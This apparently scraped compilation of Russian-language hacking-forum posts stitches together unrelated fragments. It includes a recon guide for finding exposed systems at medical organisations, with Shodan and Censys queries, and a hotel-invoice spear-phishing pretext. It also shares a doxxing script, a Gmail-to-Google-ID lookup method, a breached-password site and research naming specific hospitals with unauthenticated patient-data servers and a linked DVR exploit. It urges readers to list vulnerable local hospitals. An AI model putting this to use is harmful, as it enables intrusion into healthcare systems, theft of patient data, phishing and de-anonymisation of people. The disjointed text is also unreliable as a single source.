Стадия разведки — ключевая для выбора тактики, техник и тулз (tactics, techniques and procedures, далее TTPs), которые будут использоваться для достижения цели. Однако чаще всего задача разведки заключается в следующем: найти как можно больше потенциальных точек входа для доступа к цели и оценить стоимость реализации обнаруженных векторов. Для того чтобы усложнить жизнь атакующему, который проводит разведку, необходимо понимать, какие TTPs он использует на данном этапе.
Поиск незакрытых дверей
От множества точек входа в корпоративную сеть зависит множество векторов атак,
доступных злоумышленнику. Можно формально классифицировать точки входа:
Последний пункт зачастую требует от атакующего «интерактива» с жертвой (например, коммуникацию с объектом фишинговой атаки), что повышает риск обнаружения атаки. Поэтому в некоторых случаях приоритет отдается эксплуатабельным точкам входа, расположенным на периметре.
Сетевой периметр — понятие, которое с развитием технологий и повсеместным внедрением облаков постепенно исчезает. Концепция Bring your own device (BYOD), позволяющая сотрудникам компаний использовать личные устройства для бизнес-процессов, а также появление облаков (привет, office365!) размывают периметр. Контролировать потоки данных между корпоративной сетью и внешним миром становится невероятно трудно. И это же облегчает жизнь злоумышленникам — многообразие вариантов проникновения растет.
В больших организациях периметр пестрит сервисами, о которых забыли (или не знают) админы и которые уже давно не патчились. Предлагаю поискать такие сервисы в твоей организации. На примере любимых мною медицинских организаций мы рассмотрим множество векторов проникновения. Впоследствии ты можешь использовать полученные знания для инвентаризации периметра принадлежащих тебе сетей.
Просканировать, отметить, повторить
Очевидно, для понимания того, что расположено на сетевом периметре, необходимо получить диапазон IP-адресов, принадлежащий целевой организации. В этом списке возможно наличие IP-адресов третьих сторон (сервис-провайдеры, подрядчики и прочие) — атакующий их точно включит в скоп, а ты, как аудитор своей сети, этого делать не можешь. Полученный диапазон IP можно занести в port-сканер. Вместо Nmap я рекомендую использовать для этой цели Masscan или ZMap — это сильно сократит время сканирования.
Так, для оценки точек входа в медицинские корпоративные сети можно выгрузить
из RIPE диапазоны IP-адресов всех организаций, в названии которых присутствуют
ключевые слова:
healthcare;
medic;
clinic;
surgery;
hospit;
dental;
pharmacist.
После этого можно запускать порт-сканер и подождать его выдачу несколько дней.
Если сканировать с помощью ZMap, то впоследствии можно воспользоваться утилитой ZTag для расстановки тегов по каждому обнаруженному сервису. Теги проставляются на основе собранной базы баннеров. В случае со сканом медучреждений полученные сервисы классифицируются следующим образом.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F05%2F167602%2Fimage002.png&hash=91185e80acc7b0ad3867659a9d82e09e)
Среди тривиальных вещей вроде веб-приложений и почтовых серверов находятся интересные приложения: системы управления зданиями (building management systems; кстати, у нас по этой теме написана целая серия статей, вот например), принтеры (зачастую без какой-либо авторизации к админ-панелям), хранилища NAS (и даже специализированные PACS-серверы), умные чайники и прочее. Используя каждый из найденных сервисов, атакующий может определять векторы атаки и оценивать сложность (читай — стоимость) их реализации.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F05%2F167602%2Fimage004.png&hash=e0b8b2d0079270dcded85d3cc24353e0)
Панель управления принтером, в которой, например, виден список соседних
беспроводных сетей
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2018%2F05%2F167602%2Fimage006.png&hash=903bb6794c7dc0bbe5c3e88f0bb5e351)
Пример уязвимого медпортала, ведущего к медицинским данным
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2018%2F05%2F167602%2Fimage009.png&hash=4c09371ff0a104ac73ddb69f97b35e08)
OSINT без интерактива
Другой известный способ получить информацию о периметре и при этом никак с ним
не взаимодействовать — изучить логи Shodan и аналогичных поисковых систем,
роботы которых любезно все сделали за атакующего.
Как было видно из логов выше, в публичном доступе находятся всевозможные серверы, которые могут нести в себе специфику деятельности целевой организации и хранить ценную информацию. К примеру, если говорить о медицинских компаниях, то их периметр содержит DICOM-устройства и PACS-серверы (picture archiving and communication system). Это медицинские системы, основанные на стандарте DICOM (digital imaging and communications in medicine, отраслевой стандарт создания, хранения, передачи и визуализации медицинских изображений и документов обследованных пациентов) и состоящие из следующих компонентов:
Отличительная особенность большинства данных систем — наличие веб-интерфейса для управления ими через Сеть. Здесь могут обнаружиться уязвимости, которые злоумышленник может использовать для получения доступа к ценной информации и процессам. Стоит подробнее рассмотреть эти системы и проверить, доступны ли они из интернета, то есть служат ли потенциальной точкой входа для злоумышленника.
Поиск DICOM-устройств можно начать с простейшего запроса в поисковике Shodan:
Code:Copy to clipboard
DICOM port:104.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F05%2F167602%2Fimage010.png&hash=60fde7d12d324fa141aced4facb7e78c)
Также можно попробовать найти диагностические DICOM-станции — специализированные PACS-системы, которые используются для обработки, диагностики и визуализации данных. Пример запроса для поисковой системы Censys:
pacs and autonomous_system.organization: (hospital or clinic or medical or healthcare).
Click to expand...
Используя стандартные запросы в Shodan на получение информации о доступных ресурсах на порте 445 (SMB), атакующий иногда может узнать имена внутренних ресурсов (серверов и рабочих станций), благодаря которым определить, какие узлы в сети в дальнейшем представляют интерес, а какие — нет.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F05%2F167602%2Fimage014.png&hash=6bf79db4d1e7762d2cdaaec61b185b95)
Сбор информации для социальной инженерии
Закрепиться внутри корпоративного периметра эффективно позволяет использование различных сценариев социальной инженерии. Например, рассылка фишинговых сообщений, которые содержат вредоносные вложения или ссылки, ведущие на фишинговые ресурсы.
Для реализации данных сценариев атакующий также должен собрать информацию об объекте атаки, чтобы увеличить вероятность, что адресат перейдет по ссылке в письме или откроет вложение. В настоящее время службы безопасности крупных организаций стараются повышать осведомленность своих сотрудников о вредоносной корреспонденции, что явно не идет на пользу злоумышленникам. Теперь злодеям необходимо не только обойти спам-фильтры жертвы и доставить «полезную нагрузку» в Inbox, но и мотивировать объект атаки выполнить необходимые действия и, самое главное, не вызвать подозрений.
Обилие социальных сетей, а также «раскрепощенность» типичного их пользователя предоставляет атакующему возможность извлечь информацию о своей жертве и составить убедительный контекст «полезной нагрузки»: текст сопроводительного письма, стиль коммуникации.
Это творческая задача, и зависит она от конкретной ситуации, но в качестве общего примера можно привести ресурс, который использует открытые API популярных соцсетей для извлечения ценной информации об учетной записи.
Пример веб-сервиса OSINT, использующего API социальных сетей
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2018%2F05%2F167602%2Fimage015.png&hash=f46cceb59090480c310286494bc34909)
К примеру, атакующий, обратившись к LinkedIn, смог определить ключевых сотрудников для организации атаки spear-phishing, их имена, фамилии, контактные данные (электронную почту). Используя эти данные, несложно найти аккаунты этих сотрудников в других соцсетях, например в Facebook. При помощи веб-сервиса атакующий может собрать интересную статистику своих жертв, например где и в каких отелях они «чекинились». Далее от имени отеля злодей может отправить сообщение с напоминанием об оплате некоторых Resort Fee и прикрепленным инвойсом в виде PDF-документа. Profit!
Recon как искусство
Тема извлечения данных об объекте атаки очень обширна, и об одной только разведке на основе открытых источников написана не одна книга. По этой причине я и сфокусировал внимание на сборе технической информации о периметре — именно в нем зачастую содержатся незакрытые двери, которые не патчатся годами и о которых может не знать сам владелец.
В дополнение к этому атакующий, пробирающийся через внешние ресурсы, не взаимодействует с человеком (как это происходит в случае с социальной инженерией), а значит, единственное препятствие — это всевозможные IDS/IPS, WAF и все, что фиксирует активность на периметре. Если эти средства там вообще есть.
© Денис Макрушин
#InspiredByInsecure
2 замечательных книги: Поиск в Интернете и сервисы Яндекс и Google: эффективный поиск. Краткое руководство
Google: эффективный поиск. Краткое руководство
В книге подробно описаны методы и приемы работы с наиболее популярной на
сегодняшний день информационно-поисковой системой Google. Приведены основные
сведения о поисковых машинах и даны определения наиболее часто используемых
терминов, относящихся к поиску информации в Internet. Подробно рассмотрены все
возможности Google - от поиска текстов, изображений, товаров, новостей,
спутниковых фотографий до ведения сетевого дневника (блога) и популяризации с
помощью Google собственного сайта. Книга предназначена для тех, кто уже имеет
небольшой опыт работы на компьютере и в Internet, но еще не умеет правильно
искать в Сети необходимую информацию. Те, кто уже имеют небольшой опыт поиска
информации в Internet, также найдут для себя в книге немало интересного.
Руководители компаний, менеджеры и бизнесмены, инженеры и техники, студенты и
школьники, желающие научиться эффективно использовать многочисленные
возможности Google - всем будет интересно прочитать эту книгу.
Формат : pdf
Размер: 24 мб[New$paN]
Скачать|Download
Поиск в Интернете и сервисы Яндекс.
![](/proxy.php?image=http%3A%2F%2Foz.by%2Fdata%2Fimg_big%2FPoisk-v-Internete-
i-servisi-Yndeks-Valentin-
Holmogorov_1018851.jpg&hash=7b0734b9a17087c9d8a4716a9bb224e5)
Задача книги — познакомить читателя-пользователя со всеми возможностями,
предоставляемыми для поиска, и не только, службой Яndex. Прочитав эту книгу вы
сможете максимально эффективно пользоваться и настраивать для своих нужд
разнообразные инструменты, которые безвозмездно предлагает «многоликий Яndex».
Формат : pdf
Размер: 13 мб
Скачать|Download
Источник: vipusers.net
Whats the best method to get information from just a phone number?
Всем привет дорогие форумчане не на одном форуме не видел софта для таких
вещей в общем решил поделиться скрипт написал на языке питон и особо больших
данных сервера не нужны легко использовать.
Вам нужен сервер можно использовать так же гугл клоуд shell сервер бесплатный.
Вам не обходимо установить петон3
так sudo apt install -y python3-pip в гугле много инфы как установить петон3
это не трудно
как все установите запускаем вот так
python3 DoxkingV2.py если будет ошибка там будет написано кого модуля не
хвотает идете в гугл пишите петон3 установить (название модуля) это просто
после установке всех модулей запускаете снова и води ник или телеграм вашего
чела которого хотите задеанонить и идете по следам.
Спасибо за внимание ставьте плюс если кому помогло люди писали мне что бы я им
продал данный скрипт но для вас бесплатно.
залил на яндекс диск так как сюда не могу.
https://disk.yandex.ru/d/IRDmMfkNPuHv9g
Если тема зайдет сделаю гайд по Sherlock он более продвинутый и для
профессионалов.
Signup and go to https://account.shodan.io/billing
it gives membership for one month and 20 export credits and 100 scan and query
credits) you can give a try))
Collect content from blogs, podcasts, YouTube, Reddit & Twitter feeds using Excel and Power Automate
In this tutorial you will learn how to use Power Automate to collect content from blogs, podcasts, YouTube, Reddit and Twitter feeds and add those items to tables in Microsoft Excel. To process new sources being added to the feed lists, a form will be created using Microsoft Forms and paired with a second flow that will process new feed submissions to that form. You can think of this as a DIY content collection system for blog articles, podcast episodes, YouTube videos, Subreddit posts and Tweets.
For this example, we will be using Microsoft Excel tables to store the feeds and collect the content, but you can easily use this as a template for storing them on SharePoint lists instead.
To follow along, you will need a Microsoft 365 account and access to Power Automate and Microsoft Forms. You will also need an active Twitter account to collect Tweets.
Автор: Nihad A. Hassan Rami Hijazi
Год издания: 2019
Язык: Русский
Формат: pdf
Описание:
Применяйте методы и инструменты Open Source Intelligence (OSINT) для получения информации из общедоступных онлайн-источников для поддержки вашего интеллектуального анализа. Используйте собранные данные в различных сценариях, таких как финансовые расследования, расследования преступлений и терроризма, а также анализ конкуренции в бизнесе и получение разведданных о физических и других лицах. Эта книга также улучшит ваши способности получения информации в Интернете как из обычного Интернета, так и из скрытой паутины через два ее подслоя: глубокую паутину и темную паутину.
Автор включает в себя множество ресурсов OSINT, которые могут быть использованы как спецслужбами, так и предприятиями для мониторинга тенденций на глобальном уровне, выявления рисков и сбора разведданных конкурентов для принятия более эффективных решений. Вы откроете для себя методы и инструменты, которые в равной степени используются хакерами и тестировщиками проникновения для сбора информации о конкретной цели в Интернете. И вы будете знать, как ресурсы OSINT могут быть использованы при проведении атак социальной инженерии.
Методы и инструменты разведки с открытым исходным кодом используют практический подход и перечисляют сотни ресурсов OSINT, которые могут быть использованы для сбора разведданных из открытых онлайн-источников. В книге также рассказывается о том, как обезличить свою цифровую личность в Интернете, чтобы вы могли вести поисковую деятельность, не раскрывая себя.
Для кого предназначена книга:
Пентестеры, следователи цифровой криминалистики, разведывательные службы, военные, правоохранительные органы, учреждения ООН и коммерческие/некоммерческие предприятия
Spoiler: Содержание
• Введение
• Глава 1: Эволюция OSINT
• Категории информации с открытым исходным кодом
• Типы OSINT
• Объем цифровых данных
• OSINT Организаций
• Правительственные организации
• Частный сектор
• Серые продавцы литературы
• Стороны, заинтересованные в OSINT информации
• Правительство
• Международные организации
• Правоохранительные органы
• Бизнес-корпорации
• Пентесторы и киберпреступники / Преступные организации
• Конфиденциальность - Сознательные люди
• Террористические организации
• Типы сбора информации
• Пассивная коллекция
• Полупассивная
• Активная коллекция
• Преимущества OSINT
• Проблемы разведки с открытым исходным кодом
• Правовые и этические ограничения
• Итоги
• Глава 2: Введение в онлайн-угрозы и контрмеры
• Онлайн-угрозы
• Вредоносных программ
• Киберпреступники
• Фарминг
• Фишинг
• Кибервымогательство
• Рекламные и шпионские ПО
• Троян
• Вирус
• Черви
• Scaraware
• Руткиты
• Juice Jacking
• Wi-Fi Подслушивание
• Программное обеспечение безопасности
• Антивирус
• Брандмауэр
• Антивредоносные ПО
• Обеспечение ОС
• Защита ОС Windows
• Staying Private в Windows 10
• Уничтожение цифровых следов
• Общие настройки конфиденциальности
• Захват камеры вашего PC
• Как избежать пиратского программного обеспечения
• Обработка цифровых файлов Метаданные
• Физическое обеспечение безопасности ЭВМ
• Методы онлайн-слежения
• Отслеживание по IP-адресу
• Куки
• Цифровая отпечатки
• HTML5
• Проверка цифрового следа
• Безопасный просмотр в Интернете
• Настройка Firefox для большей приватности
• Безопасное Интернет-соединение
• VPN
• Прокси
• DNS утечка
• Анонимность в Интернете
• Использование TOR Network
• Использование Tails OS и других безопасных OS
• Безопасное совместное использование файлов
• Создание анонимных платежей
• Методы шифрования
• Защита паролей
• Шифрование Вашего HDD / USB
• Безопасность облачных хранилищ
• Безопасная электронная почта
• Технология виртуализации
• Эмулятор Android и iOS
• Основные предпосылки
• Программное обеспечение для рисования и Визуализация данных
• Бесплатные услуги по переводу
• Заключительные советы
• Итоги
• Глава 3: Глубинный интернет
• Слои Интернета
• Даркнет пользователи
• Доступ к Даркнету
• Проверки безопасности при доступе к Даркнет
• Доступ к даркнету из чистого WEBа
• Использование Tor
• Использование Tails OS
• Предупреждение при использовании Tails
• Поиск в сети Tor
• Другие анонимные сети
• I2P
• Freenet
• Двигаемся дальше
• Итоги
• Глава 4: Методы поиска
• Подбор ключевых слов и Исследование
• Использование поисковых систем для поиска информации
• Google
• Bing
• Конфиденциальность поисковых систем
• Другие Поисковые системы
• Сайты бизнес-поиска
• Поисковые системы метаданных
• Поиск кода, поисковые системы FTP
• Автоматизированные инструменты поиска
• Устройство Интернета вещей (IoT) Поисковые системы
• Веб-каталоги
• Переводчики
• История сайта и Захват веб-сайта
• Сервис мониторинга веб-сайтов
• RSS лента
• Новостной поиск
• Настройка Google News
• Новостные веб-сайты
• Обнаружение новостных фейков
• Поиск цифровых файлов
• Поиск документов
• Изображение
• Видео
• Расширение файлов и список сигнатур расширений 196
• Инструменты для повышения производительности
• Итоги
• Глава 5: Социальные медиа разведка
• Что такое социальные медиа разведка?
• Типы контента в социальных сетях
• Классификация социальных медиа-платформ
• Популярные сайты социальных сетей
• Исследование социальных медиа сайтов
• Facebook
• Twitter
• Google+
• LinkedIn
• Общие ресурсы для размещения информации на сайтах соц. медиа
• Другие социальные медиа-платформы
• Pastebin сайты
• Психологический анализ социальных медиа
• Tone Analyzer 257
• Watson Tone Analyzer
• Facebook и Twitter интерполяция
• Fake Sport
• Review Meta
• TweetGenie
• Итоги
• Глава 6: Поиск людей и публичных записей
• Что такое поисковая система людей?
• Что такое публичные записи?
• Пример публичных записей
• Поиск персональных данных
• Общий поиск людей
• Онлайн-реестры
• Существенные записи
• Уголовный и судебный поиск
• Отчеты о собственности
• Налоговые и финансовые отчеты
• Поиск номера социального страхования
• Проверка имени пользователя
• Поиск по электронной почте и исследование
• Репозиторий данных, скомпрометированных веб-сайтов
• Поиск номера телефона
• Профили сотрудников и веб-сайты о вакансиях
• Поиск сайта знакомств
• Прочие публичные записи
• Итоги
• Глава 7: Онлайн Карты
• Основы геолокации
• Как найти GPS Координаты любого местоположения на карте
• Как найти координаты геокода с адреса рассылки
• Общие инструменты геопространственных исследований
• Коммерческие спутники
• Дата/время. По всему миру
• Социальные медиа, основанные на местоположении
• YouTube
• Facebook
• Twitter
• Другие социальные медиа-платформы
• Поиска местоположения в соцсетях автомат. инструментам
• Информационный Профиль страны
• Отслеживание транспорта
• Воздушные движения
• Морское движение
• Транспортные средства и железные дороги
• Отслеживание пакетов
• Веб камеры
• Метаданные цифрового файла
• Итоги
• Глава 8: Технические Следы
• Исследуйте целевой веб-сайт
• Исследуйте файл Robots.txt
• Зеркало Целевой веб-сайт
• Извлечение ссылок
• Проверка обратных ссылок целевого веб-сайта
• Мониторинг обновлений веб-сайта
• Проверка архивного контент веб-сайта
• Определить используемые технологии
• Зачистка веб сайта
• Исследуйте метаданные файлов целевого веб-сайта
• Поиск сертификации веб-сайта
• Инструменты статистики и аналитики веб-сайта
• Инструменты проверки репутации веб-сайта
• Пассивная техническая разведка
• WHOIS Поиск
• Открытие поддоменов
• DNS разведка
• Отслеживание IP-адресов
• Итоги
• Глава 9: Что Дальше?
• Что будет с OSINT
• OSINT обработка
• Заключение
Скачать:
Hidden content for authorized users.
You must spend at least 5 day(s) on the forum to view the content.
New Google ID search method by Gmail address
1. Open hangouts.google.com on your PC and in the left corner click on
your contacts.
2. Click create a chat and enter the desired gmail address in the search.
3.Right-click on the name of the account and select Inspect
4. In developer tools, find the line with hovercard-oid
5. After this phrase will be an ID of 21 digits long, copy this ID
Using Google ID
1. https://get.google.com/albumarchive/GoogleID - replace GoogleID with
the numbers you copied, find the account's picture album.
2. https://www.google.com/maps/contrib/GoogleID - replace GoogleID with
the numbers you copied, find an account in Google Maps.
Hi i found a website like HIBP with 15 billion records including all breached databases
https://ghostproject.fr
https://twitter.com/ghostprojectme
with this website i was enable to see my old and new passwords from Zoosk2020
its really awesome tool
Did anyone try the website yet?
Сделаю парсинг по Google Maps под ваши запросы(тестирую софт)
When ꓘamerka meets healthcare — Research on exposed medical devices
Приветствую.
Должно быть, многие из вас слышали о заражении вирусами-вымогателями множества
больниц по всему миру. Такие инциденты довольно часто проскакивают в новостях
последнее время.
Отрасль здравоохранения является наиболее важной отраслью критической
инфраструктуры. Помимо того, что, как правило, на слабо защищенных серверах
мед. учреждений хранится конфиденциальная информация о состоянии здоровья
больных,
любое нарушение в работе оборудования может привести к человеческим жертвам.
Поэтому, в данной отрасли, атаки вирусов-вымогателей, созданные с целью
извлечения финансовой выгоды, являются высокоэффективными.
Аварийное отключение оборудование может привести к потере доверия, денег и,
конечно, плохой репутации больницы, не говоря уже о пациентах, которые
находятся в опасности. Поэтому, персоналу ничего не остается,
как заплатить киберпреступникам.
В сети не так уж и много информации о реализации атак на эти клиники, но я
предполагаю, что киберпреступники получают доступ, используя фишинг или
популярные уязвимости,
вроде Bluekeep, на компьютерах с включенным RDP. Помимо этого, в американских
клиниках активно используется сетевой протокол DICOM, в купе с PACS.
Помимо денежных доходов от шифрования данных, злоумышленники могут красть конфиденциальную информацию о людях, их рентгеновские снимки, платежи и медицинских записи, и использовать для шпионажа или шантажа.
Иногда для получения конфиденциальных данных даже не нужно использовать какие-
либо уязвимости. К примеру, из-за отсутствия базовых знаний по информационной
безопасности у людей,
ответственных за настройку оборудования, некоторые системы, подключенные к
сети, доступны без аутентификации.
Примером этого могут служить два сервера радиологии в Австралии. С одной
стороны, Австралия боится китайских методов шпионажа, вроде Cloud Hopper, но с
другой стороны они оставляют два незащищенных сервера
Cynetics.
Это веб-системы медицинских изображений, предназначенные для ведения
клинической отчетности мед. персоналом.
Австралийский центр кибербезопасности был проинформирован об этом, и
соответствующие меры были приняты.
Однако, так как данные были доступны всем желающим в течение месяца, они не
остались незамеченными.
Утечка вышеназванных серверов содержала 4,5 ТБ данных, включая
рентгенологические фотографии беременностей с диагнозом (почти 2 миллиона
изображений!),
счета-фактуры и личные данные пациентов.
Стоит отметить, что, заходя на эти сервера, пользователи имели привилегии
администратора. Это значит, что посетители могли просматривать абсолютно всю
информацию и даже удалять платежи пациентов,
вместе с клиническими результатами.
Таким образом, можно нанести огромный ущерб учреждению, подделывая данные клиентов или удаляя платежи. Или можно копнуть глубже и поискать уязвимости уже в самой веб-консоли Cynetics.
Самые ранние сведения о платежах и должниках датируются 2009 годом, фотографии
Возвращаясь к основной теме и наиболее важным данным в утечке, каждый пациент имеет от 10 до 40 рентгенологических фотографий с описанием.
Честно говоря, мне эти данные ни о чем не говорят, кроме того, что это какая -
то информация о плоде.
Но для тех, кто разбирается в медицине, это наверняка должно быть интересно.
Проведя беглую разведку, я выделил две клиники, в которых отсутствуют надлежащие меры безопасности.
Первая - Tara Imaging for Women
Чтобы подтвердить предположение, что админ-панель принадлежит именно этой клинике, я скачал один счет:
Название второго объекта было также найдено в самой админ-панели: Western Imaging Group, расположенная на Campbell Street.
Как компенсировать знания в медицине OSINT 'ом
Из-за отсутствия должных медицинских знаний, это было одно из самых сложных
для меня исследований, которое я когда-либо проводил. Я не врач и никогда не
интересовался медицинскими клиниками или больницами.
В процессе исследования, я многое узнал о медицинском оборудовании и о том,
как больницы связаны между собой, как работает мед. персонал и многое другое.
Для того, чтобы получить соответствующие знания, я разделил исследование на три части:
Поиск используемого оборудования и протоколов
Я начал с поиска документов, в которых бы было упомянуто оборудование,
использовавшееся в поликлиниках. Оно было нужно мне для того, чтобы далее я
мог сформировать более-менее внятные запросы в Shodan.
Но все, что я находил - бесполезные модные презентации, в которых люди
отражали статистику организаций, в которых они работают. Это, конечно,
полезно, но не для меня.
В итоге, после долгого времени поисков, меня порадовал только один найденный
документ. Этот документ был написан Кристодулосом Циампазисом из University of
Twente и носит название - «Exposure Assessment on Medical Devices in the
Netherland».
На странице [Github ](https://github.com/ChristodoulosTziampazis/Exposure-
Assessment-on-Medical-Devices-in-the-Netherlands/issues)он поделился списком
ключевых слов для поиска в Shodan, поставщиками оборудования и софтом,
используемом в мед. учреждениях и многим другим.
В процессе поиска материалов, я использовал понятия, вроде «Радиология», «Онкология», «Офтальмология», «Оториноларингология», «Неврология», «Ветеринария» и т.д.
DICOM и как он используется в медицине
DICOM (Digital Imaging and Communications in Medicine) - медицинский
отраслевой стандарт создания, хранения, передачи и визуализации цифровых
медицинских изображений и документов обследованных пациентов,
являющийся наиболее популярным в зарубежных клиниках. Если вы хотите узнать о
последствиях его появления в сети, рекомендую прочитать отчет от Greenbone.
Я начал искать устройства, использующие DICOM, для сканирования их на наличие
других открытых портов и просмотра работающих служб. Оказывается, все
настолько плохо,
что в большинстве случаев были открыты дополнительные порты, включая 3389
(RDP), 80 (HTTP), 8080 (HTTP) и другие, полезные для дальнейших исследований.
Помимо этого, для поиска мед. клиник, мед. университетов и лабораторий, я
начал составлять простенькие запросы в Shodan, например: «org: hospital»,
«org: medical» и различных их вариации, включая различные языки.
Например, на голландском языке это «org: Ziekenhuis» или на немецком - «org:
Krankenhaus». Такой подход позволил провести обширную разведку, чтобы собрать
как можно больше устройств,
подключенных к сети, в медицинских организациях.
Охота на вендоров
Последняя часть поисков состояла из сбора всевозможных поставщиков и
производителей медицинских устройств.
Мне очень помог сайт https://www.medicalexpo.com/, на котором я перебрал
всех продавцов и каждую модель их устройств, после чего перешел к шодану.
Зная, что некоторые панели входа в систему устройств имеют нижний колонтитул
типа «Powered by <нужная мне компания_нейм>», я смог найти еще много устройств
и проверить, какие дополнительные сервисы работают на машинах.
Помимо этого, я случайно обнаружил промышленные системы управления, но об этом в другой раз.
Таким образом, я представляю вам около 90 запросов для поиска различных
медицинских устройств в Shodan - от микроскопов и дефибрилляторов до мониторов
астмы.
C полным список можно ознакомиться [тут](https://github.com/woj-ciech/Kamerka-
GUI#full-list-of-supported-devices-with-corresponding-queries).
Геолокация устройств
Некоторые устройства не имеют какого - либо потенциального индикатора для
определения их точного местоположения.
Разберем несколько кейсов.
Кейс #1: Grover C. Dils Medical Center, Caliente, Nevada, United States
RIS/PACS, основанные на веб-технологиях Medweb, предлагает решения для
управления документооборотом и планированием бюджета.
Запрос: html:"DBA Medweb. All rights reserved."
Название объекта отображается в заголовке и содержании HTML.
Стоит отметить, что SSL-сертификат выдан Medweb.
Геолокация довольно проста - местоположение на основе IP указывает на ближайший город и при помощи ꓘamerka мы можем проложить маршрут до медицинского центра.
Кейс #2: IRM CHARENTON ST MAURICE, 22 rue Victor HUGO 94220, CHARENTON LE
PONT
Medecon Clipper - это веб-сервер, предназначенный для управления отчетами для
врачей общей практики.
Запрос: http.favicon.hash:-897903496
Некоторые устройства и софт используются только в определенных странах
(например, DLP-система Infowatch, в основном, только в России).
Medecom (http://www.medecom.fr/) - французская компания, большая часть
которой расположена во Франции.
Точное местоположение можно увидеть в HTML, при входе.
IP-адрес указывает на Montmorency, но фактически, клиника находится в пригороде Парижа.
В дополнении стоит сказать, что владельцы давно не обновляли версию ПО. У них
стоит Medecon Clipper версии 4.4,
хотя последняя, на момент написания статьи, - 4.10.
Кейс #3: Maternity Sainte-Elisabeth — Chu Uclouvain Namur, Place Louise
Godin 15, 5000 Namur, Belgium
Brainlab развивает здравоохранение при помощи программных технологий. Для
улучшения условий проведения операций, радиохирургических процедур и многого
другого,
они создают программные и аппаратные решения.
Запрос: title:"Brainlab Origin Server"
Telemis
Telemis - быстроразвивающаяся компания, работающая в области медицинского
оборудования и специализирующаяся на решениях PACS.
Запрос: http.favicon.hash:220883165
Это кейс - пример того, как другие службы, работающие на машине, помогают
найти дополнительные цели.
Первоначально я искал хосты Brainlab, но на том же сервере работал веб-
интерфейс Telemis.
Авторизация проходит на montgodinne.ad. Этот домен принадлежит клинике Mont- Godinne.
Telemis работает на той же машине, но на отдельном порту. Тем не менее, он подтверждает предположение о клинике, выводя название "CHU UCL Namur".
Теперь мы имеем полное название и её местоположение - CHU UCL Namur - Site Godinne. IP указывает на Waterloo, но расположение больницы отличается, примерно на 80 км.
Кейс #4: Leiden University Medical Center (LUMC), Albinusdreef 2, 2333 ZA
Leiden, The Netherlands
BrainScope - это медицинская компания, специализирующаяся на медицинской
нейротехнике, которая используется для проверки у человека черепно-мозговой
травмы.
Инновационная система BrainScope One представляет собой простую в
использовании платформу, которая позволяет врачам быстро проводить точные
оценки травм головы прямо на месте оказания медицинской помощи.
BrainScope® is an FDA-cleared, handheld decision-support tool that uses A.I. and machine learning technology to identify objective biomarkers of structural and functional brain injury in patients with suspected mild traumatic brain injury (mTBI).
brainscope.com
Запрос: title:BrainScope
Эта машина находится в сети «Leiden University Medical Centre».
Которая очень близка к местоположению, полученному из базы данных геолокации, которую использует Shodan.
Бонус
Почему больницы становятся жертвами вымогателей?
Скриншоты взяты из Shodan.
Таким образом, вы видите уже, как минимум, один вектор атаки для получения
необходимой информации о пациентах,
персонале или инфраструктуре больницы, лежащий на поверхности.
Брутфорс, Credential Stuffing или фишинг - это типичная точки входа для
злоумышленника, для того, чтобы начать заражение или украсть медицинские
данные.
Кроме того, система безопасности уязвима не только для уязвимостей нулевого
дня, но и для уже известных эксплойтов.
Попробуйте составить список больниц или медицинских клиник в вашем городе,
которые могут стать следующей целью атак злоумышленников из-за отсутствия
основных мер безопасности.
Уверен, таковых найдется не мало.
Другие интересные находки
Мне пришлось исключить пару устройств из-за их относительной малочисленности
или сложности выделить какой - то общий идентификатор для формирования
подходящих запросов в Shodan.
Wall of Analytics
Это решение от General Electric, которое работает как командный центр для
обработки данных в реальном времени,
в больнице, с использованием ИИ.
Микроскопы
Я не вижу смысла подключать микроскопы к интернету, но, как вы видите, и такое
тоже случается.
При помощи веб-консоли можно калибровать микроскоп и записывать видео.
Система обмена сообщениями для медсестры
Есть платформы, о которых я даже не подозревал. Одной из таких является служба
обмена сообщениями для медсестер.
Опять же, на мой взгляд, подключение к интернету для такой системы ни к чему.
Это решение позволяет контролировать каждую комнату, просматривать температуру и отслеживать вызовы.
Health of Future
Еще один продукт от General Electric Healthcare - Health of Future
Perioperative. Он используется для управления операционными залами. О нем
достаточно сложно найти какую - либо информацию,
я даже не смог определить актуальную версию или дефолтные пароли.
Orthanc Explorer
Это еще одна программа для просмотра DICOM. Она позволяет просматривать
рентгеновские снимки пациентов, а также другую медицинскую информацию.
Многие устройства Orthanc доступны без аутентификации.
Это все весело до тех пор, пока специалисты не начнут искать в таких продуктах уязвимости.
У них, кстати, есть демка, которую можно оценить по ссылке - https://demo.orthanc-server.com/app/explorer.html
Раскрытие информации
GlucoCare Glycemic Control System
Программное обеспечение для расчета дозы инсулина, разработанное и продаваемое
Pronia Medical Systems.
На странице входа можно увидеть сервер-кей и информацию о лицензии.
KbPort
Независимо от того, строите ли вы новый центр симуляции или расширяете
существующий, вам на помощь придет KbPort Simplicity™.
Это комплексное решение, которое поможет вам спроектировать идеальную среду
для любого предприятия.
Внутренняя инфраструктура доступна на страницу входа.
Промышленные системы управления
На третьем этапе исследований (в процессе поиска вендоров), я обнаружил не
только медицинские приборы, но и промышленные системы управления.
Некоторые производители не только оснащают больницы, но и производят и
поддерживают различные отрасли промышленности.
Одним из примеров такого типа компаний является Bosch. С одной стороны, она
предоставляет мониторы артериального давления и капсульные контрольные весы
для здравоохранения.
С другой стороны, Bosch производит системы безопасности и многие другие
продукты IoT и ICS, которые широко используются во всем мире. Пытаясь найти
медицинские устройства,
я наткнулся на Bosch Security Systems DVR 630/650/670 Series с запросом:
http.html: «Bosch Security».
https://www.exploit-db.com/exploits/34956
Около 600 таких устройств оказались доступны в интернете. В исходном коде HTML
я нашел несколько CGI-путей, которыми можно злоупотребить.
Большое спасибо @ChristiaanBeek, который подтвердил наличие уязвимости и нашел
эксплойт для этих устройств.
Он находится в публичном доступе с 2014 года и с его помощью можно получить
полный доступ над устройством.
Как вы видите, мы без труда можем получить данные для входа в панель.
Заключение
